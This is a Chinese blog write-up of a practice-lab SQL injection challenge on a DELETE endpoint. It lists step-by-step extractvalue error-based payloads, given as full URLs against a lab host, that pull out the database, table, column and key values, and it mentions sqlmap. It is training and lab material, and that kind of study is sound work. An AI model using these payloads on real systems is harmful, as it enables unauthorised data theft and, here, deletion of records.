SQL注入漏洞测试(delete注入)

*首先关于报错型注入可以参考一下*文章了解
delecte注入的多种方法
这题我使用的是extractvalue函数
在这里插入图片描述
从此可以知道注入点在删除页面的url链接的id参数中,可由报错注入来爆库

1.爆库 (pikaqiu)
http://219.153.49.228:48577/sqli_del.php?id=666 and extractvalue(1,concat(’~’,(select database())))
在这里插入图片描述

2.爆表名(message)
http://219.153.49.228:48577/sqli_del.php?id=666 and extractvalue(1,concat(’~’,(select group_concat(table_name) from information_schema.tables where table_schema=‘pikaqiu’)))
在这里插入图片描述

3.爆字段名
http://219.153.49.228:48577/sqli_del.php?id=666 and extractvalue(1,concat(’~’,(select group_concat(column_name) from information_schema.columns where table_name=‘message’)))
在这里插入图片描述
4.爆字段内容
a.由于报错内容回显只能回显32位,而"~"占了一个字符,所以爆出来的key值是少1位的,知道原因后就有很多处理方法了,可以有right()方法

b.由于key是保留字段,要用单引号括住,否则会报错

c.由于这题是请求删除的url,如果之前你请求id为61~65,因为墨者服务器数据库里面存的key的数据在这个范围(但没精确到是哪个),当前面注入成功的时候也会删除对应id的key内容,导致最后出现爆字段key值的时候,很多评论会有key值为空的情况。如果遇到这种情况,可重启环境再爆字段。

and extractvalue(1,concat(’~’,(select group_concat(key) from message)))
在这里插入图片描述
http://219.153.49.228:48577/sqli_del.php?id=666 and extractvalue(1,concat(’~’,right((select group_concat(key) from message),32)))
在这里插入图片描述
方法二:sqlmap
在这里插入图片描述
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值